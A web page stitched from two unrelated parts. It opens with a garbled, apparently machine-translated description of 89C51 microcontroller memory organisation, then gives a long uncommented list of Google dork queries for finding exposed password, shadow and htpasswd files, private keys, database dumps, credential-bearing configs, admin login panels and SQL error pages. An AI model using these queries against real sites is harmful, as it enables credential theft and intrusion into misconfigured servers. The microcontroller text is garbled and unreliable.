In operation furcation or interruptions it is necessary to rescue the data that has just done and will be the address, usually the address of the data is stored on the stack (stack), using the system Last In First Out (LIFO).

Decoder is a function to interpret the command. The command is defined as the need to order one or more bytes.

Program Counter (PC)
16 bit is a register containing the address that will be done.

Bookmarks Data (Data Pointer / DPTR)
A data register (DPTR), which is 16 bit wide mix of DPH register (the top of the byte) and DPL (the lower part of the byte). DPTR work for allocation not immediately register.

Bolean processor is the processor with a bit-free, built-in architecture 89C51. Processor has its own set of instructions, akumulator itself, RAM and I / O with allocation own. Instruction bit manipulation allowing allocation directly on the 128 bit in the RAM and 128-bit register in the register with a specific function (SFR)

Memory on mikrokontroler 89C51 organized as follows:
External program memory 64 Kbyte
External data memory 64 Kbyte
Internal data memory 384 bytes

Memoy outside
Because the PC register 16 bits wide, the CPU is able to put address memory up to 64 Kbyte.
This allocation can be done in the 64 Kbyte and 64 Kbyte Program Data, as the program memory and data memory separated logically in a way to distinguish signal strobe reading program or data

Data internal memory is divided into 2, namely:
Data internal RAM (128 bytes)
Special Function Register (128 bytes)

Special Function Register (SFR) occupy up to 80h address FFh which consists of 128 bytes. Not all addresses used in the SFR, and addresses that do not not be implemented on the chip. If the reading is done on the addresses that are not used, it will generate random data and written does not work at all. Each SFR has a name (symbol), and in particular address. In the making of the program, SFR can be called either the name or address.

Address internal RAM data is 0 to 255, consisting of:
1. Address 0 (00h) to 31 (1Fh) be occupied by 4 groups (bank) that registers each consisting of 8 bits.
2. Address 32d (20H) to the 47d (2Fh) is a block of memory that can be dialamati bytes (20H-2Fh), or a bit dialamati (00h-7Fh), or the location of 128 bits.
Address 30h to 7Fh used to register versatile (General User)
Address 128 (80h) to 255 (FFh) is used as a special function register (SFR). Register contains the address register in addition to the PC. In SFR there are 16 bytes that can be dialamati per bit, the byte address with the ending 0H or 8h

Google Hacking Keyword

Duclassified" -site:duware.com "DUware All Rights reserved"
"
duclassmate" -site:duware.com
"
Dudirectory" -site:duware.com
"
dudownload" -site:duware.com
"
Elite Forum Version *.*"
"
Link Department"
"sets mode: +k"
"your password is" filetype:log
"
DUpaypal" -site:duware.com
allinurl: admin mdb
auth_user_file.txt
config.php
eggdrop filetype:user user
enable password | secret "current configuration" -intext:the
etc (index.of)
ext:asa | ext:bak intext:uid intext:pwd -"uid..pwd" database | server | dsn
ext:inc "pwd=" "UID="
ext:ini eudora.ini
ext:ini Version=4.0.0.4 password
ext:passwd -intext:the -sample -example
ext:txt inurl:unattend.txt
ext:yml database inurl:config
filetype:bak createobject sa
filetype:bak inurl:"htaccess|passwd|shadow|htusers"
filetype:cfg mrtg "target
filetype:cfm "cfapplication name" password
filetype:conf oekakibbs
filetype:conf slapd.conf
filetype:config config intext:appSettings "User ID"
filetype:dat "password.dat"
filetype:dat inurl:Sites.dat
filetype:dat wand.dat
filetype:inc dbconn
filetype:inc intext:mysql_connect
filetype:inc mysql_connect OR mysql_pconnect
filetype:inf sysprep
filetype:ini inurl:"serv-u.ini"
filetype:ini inurl:flashFXP.ini
filetype:ini ServUDaemon
filetype:ini wcx_ftp
filetype:ini ws_ftp pwd
filetype:ldb admin
filetype:log "See `ipsec --copyright"
filetype:log inurl:"password.log"
filetype:mdb inurl:users.mdb
filetype:mdb wwforum
filetype:netrc password
filetype:pass pass intext:userid
filetype:pem intext:private
filetype:properties inurl:db intext:password
filetype:pwd service
filetype:pwl pwl
filetype:reg reg +intext:"defaultusername" +intext:"defaultpassword"
filetype:reg reg +intext:”WINVNC3”
filetype:reg reg HKEY_CURRENT_USER SSHHOSTKEYS
filetype:sql "insert into" (pass|passwd|password)
filetype:sql ("values * MD5" | "values * password" | "values * encrypt")
filetype:sql +"IDENTIFIED BY" -cvs
filetype:sql password
filetype:url +inurl:"ftp://" +inurl:";@"
filetype:xls username password email
htpasswd
htpasswd / htgroup
htpasswd / htpasswd.bak
intext:"enable password 7"
intext:"enable secret 5 $"
intext:"
EZGuestbook"
intext:"

Web Wiz Journal"
intitle:"index of" intext:connect.inc
intitle:"index of" intext:globals.inc
intitle:"Index of" passwords modified
intitle:"Index of" sc_serv.conf sc_serv content
intitle:"phpinfo()" +"mysql.default_password" +"Zend Scripting Language Engine"
intitle:dupics inurl:(add.asp | default.asp | view.asp | voting.asp) -site:duware.com
intitle:index.of administrators.pwd
intitle:Index.of etc shadow
intitle:index.of intext:"secring.skr"|"secring.pgp"|"secring.bak"
intitle:rapidshare intext:login
inurl:"calendarscript/users.txt"
inurl:"editor/list.asp" | inurl:"database_editor.asp" | inurl:"login.asa" "are set"
inurl:"GRC.DAT" intext:"password"
inurl:"Sites.dat"+"PASS="
inurl:"slapd.conf" intext:"credentials" -manpage -"Manual Page" -man: -sample
inurl:"slapd.conf" intext:"rootpw" -manpage -"Manual Page" -man: -sample
inurl:"wvdial.conf" intext:"password"
inurl:/db/main.mdb
inurl:/wwwboard
inurl:/yabb/Members/Admin.dat
inurl:ccbill filetype:log
inurl:cgi-bin inurl:calendar.cfg
inurl:chap-secrets -cvs
inurl:config.php dbuname dbpass
inurl:filezilla.xml -cvs
inurl:lilo.conf filetype:conf password -tatercounter2000 -bootpwd -man
inurl:nuke filetype:sql
inurl:ospfd.conf intext:password -sample -test -tutorial -download
inurl:pap-secrets -cvs
inurl:pass.dat
inurl:perform filetype:ini
inurl:perform.ini filetype:ini
inurl:secring ext:skr | ext:pgp | ext:bak
inurl:server.cfg rcon password
inurl:ventrilo_srv.ini adminpassword
inurl:vtund.conf intext:pass -cvs
inurl:zebra.conf intext:password -sample -test -tutorial -download
LeapFTP intitle:"index.of./" sites.ini modified
master.passwd
mysql history files
NickServ registration passwords
passlist
passlist.txt (a better way)
passwd
passwd / etc (reliable)
people.lst
psyBNC config files
pwd.db
server-dbs "intitle:index of"
signin filetype:url
spwd.db / passwd
trillian.ini
wwwboard WebAdmin inurl:passwd.txt wwwboard|webadmin
[WFClient] Password= filetype:ica
intitle:"remote assessment" OpenAanval Console
intitle:opengroupware.org "resistance is obsolete" "Report Bugs" "Username" "password"
"bp blog admin" intitle:login | intitle:admin -site:johnny.ihackstuff.com
"Emergisoft web applications are a part of our"
"Establishing a secure Integrated Lights Out session with" OR intitle:"Data Frame - Browser not HTTP 1.1 compatible" OR intitle:"HP Integrated Lights-
"HostingAccelerator" intitle:"login" +"Username" -"news" -demo
"iCONECT 4.1 :: Login"
"IMail Server Web Messaging" intitle:login
"inspanel" intitle:"login" -"cannot" "Login ID" -site:inspediumsoft.com
"intitle:3300 Integrated Communications Platform" inurl:main.htm
"Login - Sun Cobalt RaQ"
"login prompt" inurl:GM.cgi
"Login to Usermin" inurl:20000
"Microsoft CRM : Unsupported Browser Version"
"OPENSRS Domain Management" inurl:manage.cgi
"pcANYWHERE EXPRESS Java Client"
"Please authenticate yourself to get access to the management interface"
"please log in"
"Please login with admin pass" -"leak" -sourceforge
"
CuteNews" "2003..2005 CutePHP"
"
DWMail" password intitle:dwmail
"
Merak Mail Server Software" -.gov -.mil -.edu -site:merakmailserver.com
"
Midmart Messageboard" "Administrator Login"
"
Monster Top List" MTL numrange:200-
"
UebiMiau" -site:sourceforge.net
"site info for" "Enter Admin Password"
"SquirrelMail version" "By the SquirrelMail Development Team"
"SysCP - login"
"This is a restricted Access Server" "Javascript Not Enabled!"|"Messenger Express" -edu -ac
"This section is for Administrators only. If you are an administrator then please"
"ttawlogin.cgi/?action="
"VHCS Pro ver" -demo
"VNC Desktop" inurl:5800
"Web-Based Management" "Please input password to login" -inurl:johnny.ihackstuff.com
"WebExplorer Server - Login" "Welcome to WebExplorer Server"
"WebSTAR Mail - Please Log In"
"You have requested access to a restricted area of our website. Please authenticate yourself to continue."
"You have requested to access the management functions" -.edu
(intitle:"Please login - Forums
UBB.threads")|(inurl:login.php "ubb")
(intitle:"Please login - Forums
WWWThreads")|(inurl:"wwwthreads/login.php")|(inurl:"wwwthreads/login.pl?Cat=")
(intitle:"rymo Login")|(intext:"Welcome to rymo") -family
(intitle:"WmSC e-Cart Administration")|(intitle:"WebMyStyle e-Cart Administration")
(inurl:"ars/cgi-bin/arweb?O=0" | inurl:arweb.jsp) -site:remedy.com -site:mil
4images Administration Control Panel
allintitle:"Welcome to the Cyclades"
allinurl:"exchange/logon.asp"
allinurl:wps/portal/ login
ASP.login_aspx "ASP.NET_SessionId"
CGI:IRC Login
ext:cgi intitle:"control panel" "enter your owner password to continue!"
ez Publish administration
filetype:php inurl:"webeditor.php"
filetype:pl "Download: SuSE Linux Openexchange Server CA"
filetype:r2w r2w
intext:""BiTBOARD v2.0" BiTSHiFTERS Bulletin Board"
intext:"Fill out the form below completely to change your password and user name. If new username is left blank, your old one will be assumed." -edu
intext:"Mail admins login here to administrate your domain."
intext:"Master Account" "Domain Name" "Password" inurl:/cgi-bin/qmailadmin
intext:"Master Account" "Domain Name" "Password" inurl:/cgi-bin/qmailadmin
intext:"Storage Management Server for" intitle:"Server Administration"
intext:"Welcome to" inurl:"cp" intitle:"H-SPHERE" inurl:"begin.html" -Fee
intext:"vbulletin" inurl:admincp
intitle:"*- HP WBEM Login" | "You are being prompted to provide login account information for *" | "Please provide the information requested and press
intitle:"Admin Login" "admin login" "blogware"
intitle:"Admin login" "Web Site Administration" "Copyright"
intitle:"AlternC Desktop"
intitle:"Athens Authentication Point"
intitle:"b2evo > Login form" "Login form. You must log in! You will have to accept cookies in order to log in" -demo -site:b2evolution.net
intitle:"Cisco CallManager User Options Log On" "Please enter your User ID and Password in the spaces provided below and click the Log On button to co
intitle:"ColdFusion Administrator Login"
intitle:"communigate pro * *" intitle:"entrance"
intitle:"Content Management System" "user name"|"password"|"admin" "Microsoft IE 5.5" -mambo
intitle:"Content Management System" "user name"|"password"|"admin" "Microsoft IE 5.5" -mambo
intitle:"Dell Remote Access Controller"
intitle:"Docutek ERes - Admin Login" -edu
intitle:"Employee Intranet Login"
intitle:"eMule *" intitle:"- Web Control Panel" intext:"Web Control Panel" "Enter your password here."
intitle:"ePowerSwitch Login"
intitle:"eXist Database Administration" -demo
intitle:"EXTRANET * - Identification"
intitle:"EXTRANET login" -.edu -.mil -.gov
intitle:"EZPartner" -netpond
intitle:"Flash Operator Panel" -ext:php -wiki -cms -inurl:asternic -inurl:sip -intitle:ANNOUNCE -inurl:lists
intitle:"i-secure v1.1" -edu
intitle:"Icecast Administration Admin Page"
intitle:"iDevAffiliate - admin" -demo
intitle:"ISPMan : Unauthorized Access prohibited"
intitle:"ITS System Information" "Please log on to the SAP System"
intitle:"Kurant Corporation StoreSense" filetype:bok
intitle:"ListMail Login" admin -demo
intitle:"Login -
Easy File Sharing Web Server"
intitle:"Login Forum
AnyBoard" intitle:"If you are a new user:" intext:"Forum
AnyBoard" inurl:gochat -edu
intitle:"Login to @Mail" (ext:pl | inurl:"index") -dwaffleman
intitle:"Login to Cacti"
intitle:"Login to the forums - @www.aimoo.com" inurl:login.cfm?id=
intitle:"MailMan Login"
intitle:"Member Login" "NOTE: Your browser must have cookies enabled in order to log into the site." ext:php OR ext:cgi
intitle:"Merak Mail Server Web Administration" -ihackstuff.com
intitle:"microsoft certificate services" inurl:certsrv
intitle:"MikroTik RouterOS Managing Webpage"
intitle:"MX Control Console" "If you can't remember"
intitle:"Novell Web Services" "GroupWise" -inurl:"doc/11924" -.mil -.edu -.gov -filetype:pdf
intitle:"Novell Web Services" intext:"Select a service and a language."
intitle:"oMail-admin Administration - Login" -inurl:omnis.ch
intitle:"OnLine Recruitment Program - Login"
intitle:"Philex 0.2*" -script -site:freelists.org
intitle:"PHP Advanced Transfer" inurl:"login.php"
intitle:"php icalendar administration" -site:sourceforge.net
intitle:"php icalendar administration" -site:sourceforge.net
intitle:"phpPgAdmin - Login" Language
intitle:"PHProjekt - login" login password
intitle:"please login" "your password is *"
intitle:"Remote Desktop Web Connection" inurl:tsweb
intitle:"SFXAdmin - sfx_global" | intitle:"SFXAdmin - sfx_local" | intitle:"SFXAdmin - sfx_test"
intitle:"SHOUTcast Administrator" inurl:admin.cgi
intitle:"site administration: please log in" "site designed by emarketsouth"
intitle:"Supero Doctor III" -inurl:supermicro
intitle:"SuSE Linux Openexchange Server" "Please activate JavaScript!"
intitle:"teamspeak server-administration
intitle:"Tomcat Server Administration"
intitle:"TOPdesk ApplicationServer"
intitle:"TUTOS Login"
intitle:"TWIG Login"
intitle:"vhost" intext:"vHost . 2000-2004"
intitle:"Virtual Server Administration System"
intitle:"VisNetic WebMail" inurl:"/mail/"
intitle:"VitalQIP IP Management System"
intitle:"VMware Management Interface:" inurl:"vmware/en/"
intitle:"VNC viewer for Java"
intitle:"web-cyradm"|"by Luc de Louw" "This is only for authorized users" -tar.gz -site:web-cyradm.org
intitle:"WebLogic Server" intitle:"Console Login" inurl:console
intitle:"Welcome Site/User Administrator" "Please select the language" -demos
intitle:"Welcome to Mailtraq WebMail"
intitle:"welcome to netware *" -site:novell.com
intitle:"WorldClient" intext:"? (2003|2004) Alt-N Technologies."
intitle:"xams 0.0.0..15 - Login"
intitle:"XcAuctionLite" | "DRIVEN BY XCENT" Lite inurl:admin
intitle:"XMail Web Administration Interface" intext:Login intext:password
intitle:"Zope Help System" inurl:HelpSys
intitle:"ZyXEL Prestige Router" "Enter password"
intitle:"inc. vpn 3000 concentrator"
intitle:("TrackerCam Live Video")|("TrackerCam Application Login")|("Trackercam Remote") -trackercam.com
intitle:asterisk.management.portal web-access
intitle:endymion.sak?.mail.login.page | inurl:sake.servlet
intitle:Group-Office "Enter your username and password to login"
intitle:ilohamail "
IlohaMail"
intitle:ilohamail intext:"Version 0.8.10" "
IlohaMail"
intitle:IMP inurl:imp/index.php3
intitle:Login * Webmailer
intitle:Login intext:"RT is ? Copyright"
intitle:Node.List Win32.Version.3.11
intitle:Novell intitle:WebAccess "Copyright *-* Novell, Inc"
intitle:open-xchange inurl:login.pl
intitle:Ovislink inurl:private/login
intitle:phpnews.login
intitle:plesk inurl:login.php3
inurl:"/admin/configuration. php?" Mystore
inurl:"/slxweb.dll/external?name=(custportal|webticketcust)"
inurl:"1220/parse_xml.cgi?"
inurl:"631/admin" (inurl:"op=*") | (intitle:CUPS)
inurl:":10000" intext:webmin
inurl:"Activex/default.htm" "Demo"
inurl:"calendar.asp?action=login"
inurl:"default/login.php" intitle:"kerio"
inurl:"gs/adminlogin.aspx"
inurl:"php121login.php"
inurl:"suse/login.pl"
inurl:"typo3/index.php?u=" -demo
inurl:"usysinfo?login=true"
inurl:"utilities/TreeView.asp"
inurl:"vsadmin/login" | inurl:"vsadmin/admin" inurl:.php|.asp

nurl:/admin/login.asp
inurl:/cgi-bin/sqwebmail?noframes=1
inurl:/Citrix/Nfuse17/
inurl:/dana-na/auth/welcome.html
inurl:/eprise/
inurl:/Merchant2/admin.mv | inurl:/Merchant2/admin.mvc | intitle:"Miva Merchant Administration Login" -inurl:cheap-malboro.net
inurl:/modcp/ intext:Moderator+vBulletin
inurl:/SUSAdmin intitle:"Microsoft Software Update Services"
inurl:/webedit.* intext:WebEdit Professional -html
inurl:1810 "Oracle Enterprise Manager"
inurl:2000 intitle:RemotelyAnywhere -site:realvnc.com
inurl::2082/frontend -demo
inurl:administrator "welcome to mambo"
inurl:bin.welcome.sh | inurl:bin.welcome.bat | intitle:eHealth.5.0
inurl:cgi-bin/ultimatebb.cgi?ubb=login
inurl:Citrix/MetaFrame/default/default.aspx
inurl:confixx inurl:login|anmeldung
inurl:coranto.cgi intitle:Login (Authorized Users Only)
inurl:csCreatePro.cgi
inurl:default.asp intitle:"WebCommander"
inurl:exchweb/bin/auth/owalogon.asp
inurl:gnatsweb.pl
inurl:ids5web
inurl:irc filetype:cgi cgi:irc
inurl:login filetype:swf swf
inurl:login.asp
inurl:login.cfm
inurl:login.php "SquirrelMail version"
inurl:metaframexp/default/login.asp | intitle:"Metaframe XP Login"
inurl:mewebmail
inurl:names.nsf?opendatabase
inurl:ocw_login_username
inurl:orasso.wwsso_app_admin.ls_login
inurl:postfixadmin intitle:"postfix admin" ext:php
inurl:search/admin.php
inurl:textpattern/index.php
inurl:WCP_USER
inurl:webmail./index.pl "Interface"
inurl:webvpn.html "login" "Please enter your"
Login ("
Jetbox One CMS ™" | "
Jetstream ? *")
Novell NetWare intext:"netware management portal version"
Outlook Web Access (a better way)
PhotoPost PHP Upload
PHPhotoalbum Statistics
PHPhotoalbum Upload
phpWebMail
Please enter a valid password! inurl:polladmin

INDEXU
Ultima Online loginservers
W-Nailer Upload Area
intitle:"DocuShare" inurl:"docushare/dsweb/" -faq -gov -edu
"#mysql dump" filetype:sql
"#mysql dump" filetype:sql 21232f297a57a5a743894a0e4a801fc3
"allow_call_time_pass_reference" "PATH_INFO"
"Certificate Practice Statement" inurl:(PDF | DOC)
"Generated by phpSystem"
"generated by wwwstat"
"Host Vulnerability Summary Report"
"HTTP_FROM=googlebot" googlebot.com "Server_Software="
"Index of" / "chat/logs"
"Installed Objects Scanner" inurl:default.asp
"MacHTTP" filetype:log inurl:machttp.log
"Mecury Version" "Infastructure Group"
"Microsoft (R) Windows * (TM) Version * DrWtsn32 Copyright (C)" ext:log
"Most Submitted Forms and Scripts" "this section"
"Network Vulnerability Assessment Report"
"not for distribution" confidential
"not for public release" -.edu -.gov -.mil
"phone * * *" "address *" "e-mail" intitle:"curriculum vitae"
"phpMyAdmin" "running on" inurl:"main.php"
"produced by getstats"
"Request Details" "Control Tree" "Server Variables"
"robots.txt" "Disallow:" filetype:txt
"Running in Child mode"
"sets mode: +p"
"sets mode: +s"
"Thank you for your order" +receipt
"This is a Shareaza Node"
"This report was generated by WebLog"
( filetype:mail | filetype:eml | filetype:mbox | filetype:mbx ) intext:password|subject
(intitle:"PRTG Traffic Grapher" inurl:"allsensors")|(intitle:"PRTG Traffic Grapher - Monitoring Results")
(intitle:WebStatistica inurl:main.php) | (intitle:"WebSTATISTICA server") -inurl:statsoft -inurl:statsoftsa -inurl:statsoftinc.com -edu -software -rob
(inurl:"robot.txt" | inurl:"robots.txt" ) intext:disallow filetype:txt
+":8080" +":3128" +":80" filetype:txt
+"HSTSNR" -"netop.com"
-site:php.net -"The PHP Group" inurl:source inurl:url ext:pHp
94FBR "ADOBE PHOTOSHOP"
AIM buddy lists
allinurl:/examples/jsp/snp/snoop.jsp
allinurl:cdkey.txt
allinurl:servlet/SnoopServlet
cgiirc.conf
cgiirc.conf
contacts ext:wml
data filetype:mdb -site:gov -site:mil
exported email addresses
ext:(doc | pdf | xls | txt | ps | rtf | odt | sxw | psw | ppt | pps | xml) (intext:confidential salary | intext:"budget approved") inurl:confidential
ext:asp inurl:pathto.asp
ext:ccm ccm -catacomb
ext:CDX CDX
ext:cgi inurl:editcgi.cgi inurl:file=
ext:conf inurl:rsyncd.conf -cvs -man
ext:conf NoCatAuth -cvs
ext:dat bpk.dat
ext:gho gho
ext:ics ics
ext:ini intext:env.ini
ext:jbf jbf
ext:ldif ldif
ext:log "Software: Microsoft Internet Information Services *.*"
ext:mdb inurl:*.mdb inurl:fpdb shop.mdb
ext:nsf nsf -gov -mil
ext:plist filetype:plist inurl:bookmarks.plist
ext:pqi pqi -database
ext:reg "username=*" putty
ext:txt "Final encryption key"
ext:txt inurl:dxdiag
ext:vmdk vmdk
ext:vmx vmx
filetype:asp DBQ=" * Server.MapPath("*.mdb")
filetype:bkf bkf
filetype:blt "buddylist"
filetype:blt blt +intext:screenname
filetype:cfg auto_inst.cfg
filetype:cnf inurl:_vti_pvt access.cnf
filetype:conf inurl:firewall -intitle:cvs
filetype:config web.config -CVS
filetype:ctt Contact
filetype:ctt ctt messenger
filetype:eml eml +intext:"Subject" +intext:"From" +intext:"To"
filetype:fp3 fp3
filetype:fp5 fp5 -site:gov -site:mil -"cvs log"
filetype:fp7 fp7
filetype:inf inurl:capolicy.inf
filetype:lic lic intext:key
filetype:log access.log -CVS
filetype:log cron.log
filetype:mbx mbx intext:Subject
filetype:myd myd -CVS
filetype:ns1 ns1
filetype:ora ora
filetype:ora tnsnames
filetype:pdb pdb backup (Pilot | Pluckerdb)
filetype:php inurl:index inurl:phpicalendar -site:sourceforge.net
filetype:pot inurl:john.pot
filetype:PS ps
filetype:pst inurl:"outlook.pst"
filetype:pst pst -from -to -date
filetype:qbb qbb
filetype:QBW qbw
filetype:rdp rdp
filetype:reg "Terminal Server Client"
filetype:vcs vcs
filetype:wab wab
filetype:xls -site:gov inurl:contact
filetype:xls inurl:"email.xls"
Financial spreadsheets: finance.xls
Financial spreadsheets: finances.xls
Ganglia Cluster Reports
haccess.ctl (one way)
haccess.ctl (VERY reliable)
ICQ chat logs, please...
intext:"Session Start * * * *:*:* *" filetype:log
intext:"Tobias Oetiker" "traffic analysis"
intext:(password | passcode) intext:(username | userid | user) filetype:csv
intext:gmail invite intext:http://gmail.google.com/gmail/a
intext:SQLiteManager inurl:main.php
intext:ViewCVS inurl:Settings.php
intitle:"admin panel" +"
RedKernel"
intitle:"Apache::Status" (inurl:server-status | inurl:status.html | inurl:apache.html)
intitle:"AppServ Open Project" -site:www.appservnetwork.com
intitle:"ASP Stats Generator *.*" "ASP Stats Generator" "2003-2004 weppos"
intitle:"Big Sister" +"OK Attention Trouble"
intitle:"curriculum vitae" filetype:doc
intitle:"edna:streaming mp3 server" -forums
intitle:"FTP root at"
intitle:"index of" +myd size
intitle:"Index Of" -inurl:maillog maillog size
intitle:"Index Of" cookies.txt size
intitle:"index of" mysql.conf OR mysql_config
intitle:"Index of" upload size parent directory
intitle:"index.of *" admin news.asp configview.asp
intitle:"index.of" .diz .nfo last modified
intitle:"Joomla - Web Installer"
intitle:"LOGREP - Log file reporting system" -site:itefix.no
intitle:"Multimon UPS status page"
intitle:"PHP Advanced Transfer" (inurl:index.php | inurl:showrecent.php )
intitle:"PhpMyExplorer" inurl:"index.php" -cvs
intitle:"statistics of" "advanced web statistics"
intitle:"System Statistics" +"System and Network Information Center"
intitle:"urchin (5|3|admin)" ext:cgi
intitle:"Usage Statistics for" "Generated by Webalizer"
intitle:"wbem" compaq login "Compaq Information Technologies Group"
intitle:"Web Server Statistics for ****"
intitle:"web server status" SSH Telnet
intitle:"Welcome to F-Secure Policy Manager Server Welcome Page"
intitle:"welcome.to.squeezebox"
intitle:admin intitle:login
intitle:Bookmarks inurl:bookmarks.html "Bookmarks
intitle:index.of "Apache" "server at"
intitle:index.of cleanup.log
intitle:index.of dead.letter
intitle:index.of inbox
intitle:index.of inbox dbx
intitle:index.of ws_ftp.ini
intitle:intranet inurl:intranet +intext:"phone"
inurl:"/axs/ax-admin.pl" -script
inurl:"/cricket/grapher.cgi"
inurl:"bookmark.htm"
inurl:"cacti" +inurl:"graph_view.php" +"Settings Tree View" -cvs -RPM
inurl:"newsletter/admin/"
inurl:"newsletter/admin/" intitle:"newsletter admin"
inurl:"putty.reg"
inurl:"smb.conf" intext:"workgroup" filetype:conf conf
inurl:*db filetype:mdb
inurl:/cgi-bin/pass.txt
inurl:/_layouts/settings
inurl:admin filetype:xls
inurl:admin intitle:login
inurl:backup filetype:mdb
inurl:build.err
inurl:cgi-bin/printenv
inurl:cgi-bin/testcgi.exe "Please distribute TestCGI"
inurl:changepassword.asp
inurl:ds.py
inurl:email filetype:mdb
inurl:fcgi-bin/echo
inurl:forum filetype:mdb
inurl:forward filetype:forward -cvs
inurl:getmsg.html intitle:hotmail
inurl:log.nsf -gov
inurl:main.php phpMyAdmin
inurl:main.php Welcome to phpMyAdmin
inurl:netscape.hst
inurl:netscape.hst
inurl:netscape.ini
inurl:odbc.ini ext:ini -cvs
inurl:perl/printenv
inurl:php.ini filetype:ini
inurl:preferences.ini "[emule]"
inurl:profiles filetype:mdb
inurl:report "EVEREST Home Edition "
inurl:server-info "Apache Server Information"
inurl:server-status "apache"
inurl:snitz_forums_2000.mdb
inurl:ssl.conf filetype:conf
inurl:tdbin
inurl:vbstats.php "page generated"
inurl:wp-mail.php + "There doesn't seem to be any new mail."
inurl:XcCDONTS.asp
ipsec.conf
ipsec.secrets
ipsec.secrets
Lotus Domino address books
mail filetype:csv -site:gov intext:name
Microsoft Money Data Files
mt-db-pass.cgi files
MySQL tabledata dumps
mystuff.xml - Trillian data files
OWA Public Folders (direct view)
Peoples MSN contact lists
php-addressbook "This is the addressbook for *" -warning
phpinfo()
phpMyAdmin dumps
phpMyAdmin dumps
private key files (.csr)
private key files (.key)
Quicken data files
rdbqds -site:.edu -site:.mil -site:.gov
robots.txt
site:edu admin grades
site:www.mailinator.com inurl:ShowMail.do
SQL data dumps
Squid cache server reports
Unreal IRCd
WebLog Referrers
Welcome to ntop!

Fichier contenant des informations sur le r?seau :

filetype:log intext:"ConnectionManager2"
"apricot - admin" 00h
"by Reimar Hoven. All Rights Reserved. Disclaimer" | inurl:"log/logdb.dta"
"Network Host Assessment Report" "Internet Scanner"
"Output produced by SysWatch *"
"Phorum Admin" "Database Connection" inurl:forum inurl:admin
"
phpOpenTracker" Statistics
"powered | performed by Beyond Security's Automated Scanning" -kazaa -example
"Shadow Security Scanner performed a vulnerability assessment"
"SnortSnarf alert page"
"The following report contains confidential information" vulnerability -search
"The statistics were last updated" "Daily"-microsoft.com
"this proxy is working fine!" "enter *" "URL***" * visit
"This report lists" "identified by Internet Scanner"
"Traffic Analysis for" "RMON Port * on unit *"
"Version Info" "Boot Version" "Internet Settings"
((inurl:ifgraph "Page generated at") OR ("This page was built using ifgraph"))
Analysis Console for Incident Databases
ext:cfg radius.cfg
ext:cgi intext:"nrg-" " This web page was created on "
filetype:pdf "Assessment Report" nessus
filetype:php inurl:ipinfo.php "Distributed Intrusion Detection System"
filetype:php inurl:nqt intext:"Network Query Tool"
filetype:vsd vsd network -samples -examples
intext:"Welcome to the Web V.Networks" intitle:"V.Networks [Top]" -filetype:htm
intitle:"ADSL Configuration page"
intitle:"Azureus : Java BitTorrent Client Tracker"
intitle:"Belarc Advisor Current Profile" intext:"Click here for Belarc's PC Management products, for large and small companies."
intitle:"BNBT Tracker Info"
intitle:"Microsoft Site Server Analysis"
intitle:"Nessus Scan Report" "This file was generated by Nessus"
intitle:"PHPBTTracker Statistics" | intitle:"PHPBT Tracker Statistics"
intitle:"Retina Report" "CONFIDENTIAL INFORMATION"
intitle:"start.managing.the.device" remote pbx acc
intitle:"sysinfo * " intext:"Generated by Sysinfo * written by The Gamblers."
intitle:"twiki" inurl:"TWikiUsers"
inurl:"/catalog.nsf" intitle:catalog
inurl:"install/install.php"
inurl:"map.asp?" intitle:"WhatsUp Gold"
inurl:"NmConsole/Login.asp" | intitle:"Login - Ipswitch WhatsUp Professional 2005" | intext:"Ipswitch WhatsUp Professional 2005 (SP1)" "Ipswitch, Inc"
inurl:"sitescope.html" intitle:"sitescope" intext:"refresh" -demo
inurl:/adm-cfgedit.php
inurl:/cgi-bin/finger? "In real life"
inurl:/cgi-bin/finger? Enter (account|host|user|username)
inurl:/counter/index.php intitle:"+PHPCounter 7.*"
inurl:CrazyWWWBoard.cgi intext:"detailed debugging information"
inurl:login.jsp.bak
inurl:ovcgi/jovw
inurl:phpSysInfo/ "created by phpsysinfo"
inurl:portscan.php "from Port"|"Port Range"
inurl:proxy | inurl:wpad ext:pac | ext:dat findproxyforurl
inurl:statrep.nsf -gov
inurl:status.cgi?host=all
inurl:testcgi xitami
inurl:webalizer filetype:png -.gov -.edu -.mil -opendarwin
inurl:webutil.pl
Looking Glass
site:netcraft.com intitle:That.Site.Running Apache
"A syntax error has occurred" filetype:ihtml
"access denied for user" "using password"
"An illegal character has been found in the statement" -"previous message"
"ASP.NET_SessionId" "data source="
"Can't connect to local" intitle:warning
"Chatologica MetaSearch" "stack tracking"
"detected an internal error [IBM][CLI Driver][DB2/6000]"
"error found handling the request" cocoon filetype:xml
"Fatal error: Call to undefined function" -reply -the -next
"Incorrect syntax near"
"Incorrect syntax near"
"Internal Server Error" "server at"
"Invision Power Board Database Error"
"ORA-00933: SQL command not properly ended"
"ORA-12541: TNS:no listener" intitle:"error occurred"
"Parse error: parse error, unexpected T_VARIABLE" "on line" filetype:php
"PostgreSQL query failed: ERROR: parser: parse error"
"Supplied argument is not a valid MySQL result resource"
"Syntax error in query expression " -the
"The script whose uid is " "is not allowed to access"
"There seems to have been a problem with the" " Please try again by clicking the Refresh button in your web browser."
"Unable to jump to row" "on MySQL result index" "on line"
"Unclosed quotation mark before the character string"
"Warning: Bad arguments to (join|implode) () in" "on line" -help -forum
"Warning: Cannot modify header information - headers already sent"
"Warning: Division by zero in" "on line" -forum
"Warning: mysql_connect(): Access denied for user: '*@*" "on line" -help -forum
"Warning: mysql_query()" "invalid query"
"Warning: pg_connect(): Unable to connect to PostgreSQL server: FATAL"
"Warning: Supplied argument is not a valid File-Handle resource in"
"Warning:" "failed to open stream: HTTP request failed" "on line"
"Warning:" "SAFE MODE Restriction in effect." "The script whose uid is" "is not allowed to access owned by uid 0 in" "on line"
"SQL Server Driver][SQL Server]Line 1: Incorrect syntax near"
An unexpected token "END-OF-STATEMENT" was found
Coldfusion Error Pages
filetype:asp + "[ODBC SQL"
filetype:asp "Custom Error Message" Category Source
filetype:log "PHP Parse error" | "PHP Warning" | "PHP Error"
filetype:php inurl:"logging.php" "Discuz" error
ht://Dig htsearch error
IIS 4.0 error messages
IIS web server error messages
Internal Server Error
intext:"Error Message : Error loading required libraries."
intext:"Warning: Failed opening" "on line" "include_path"
intitle:"Apache Tomcat" "Error Report"
intitle:"Default PLESK Page"
intitle:"Error Occurred While Processing Request" +WHERE (SELECT|INSERT) filetype:cfm
intitle:"Error Occurred" "The error occurred in" filetype:cfm
intitle:"Error using Hypernews" "Server Software"
intitle:"Execution of this script not permitted"
intitle:"Under construction" "does not currently have"
intitle:Configuration.File inurl:softcart.exe
MYSQL error message: supplied argument....
mysql error with query
Netscape Application Server Error page
ORA-00921: unexpected end of SQL command
